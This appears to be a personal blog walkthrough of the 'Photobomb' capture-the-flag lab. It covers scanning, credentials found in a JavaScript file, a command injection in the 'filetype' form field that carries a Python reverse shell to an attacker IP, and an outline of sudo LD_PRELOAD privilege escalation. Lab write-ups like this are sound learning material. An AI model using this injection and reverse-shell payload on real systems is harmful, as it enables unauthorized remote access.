CTF Photobomb

CTF Linux
Created At :
Count:433 Views 👀 :
  1. Rustscan
  2. wfuzz
    1. Subdomain
  3. dig
  4. Gobuster
  5. Website
    1. Internal port
    2. SSTI ?
    3. Source code
    4. Download the photos
  6. Reverse shell
  7. Privilage escalation

Rustscan

rustscan -a photobomb.htb --ulimit 5000

Output:

Open 10.129.202.206:22
Open 10.129.202.206:80

wfuzz

Subdomain

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://photobomb.htb' -H "Host: FUZZ.photobomb.htb" --sc 200

No subdomain

dig

dig axfr photobomb.htb @photobomb.htb

Nothing

Gobuster

gobuster dir -u http://photobomb.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x txt,php,html --wildcard switch |grep "Status: 200"

Website

Internal port

I was trying te determin if it the website can andle php or html, and I found this.
The image don’t display.
Also, Sinatra should be a user.

SSTI ?

http://photobomb.htb/{{7*7}}

Source code

In the js file:

this is a username with the password.
http://pH0t0:b0Mb!@photobomb.htb/printer

Download the photos

I cupy the request as curl comand.

curl 'http://photobomb.htb/printer' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://photobomb.htb' -H 'Authorization: Basic cEgwdDA6YjBNYiE=' -H 'Connection: keep-alive' -H 'Referer: http://photobomb.htb/printer' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000'

Reverse shell

If I add this in the bodu and listenj with netcat I can spawn a reverse shell.
Listen:

nc -nlvp 8645

Connect:

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;export RHOST="10.10.14.93";export RPORT=8645;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1920x1080

Privilage escalation

sudo -l

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH
Create the payload

Download it:

And compile it:

I have to compile it myself…

This is fine.
Then send it to the target and run it.

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme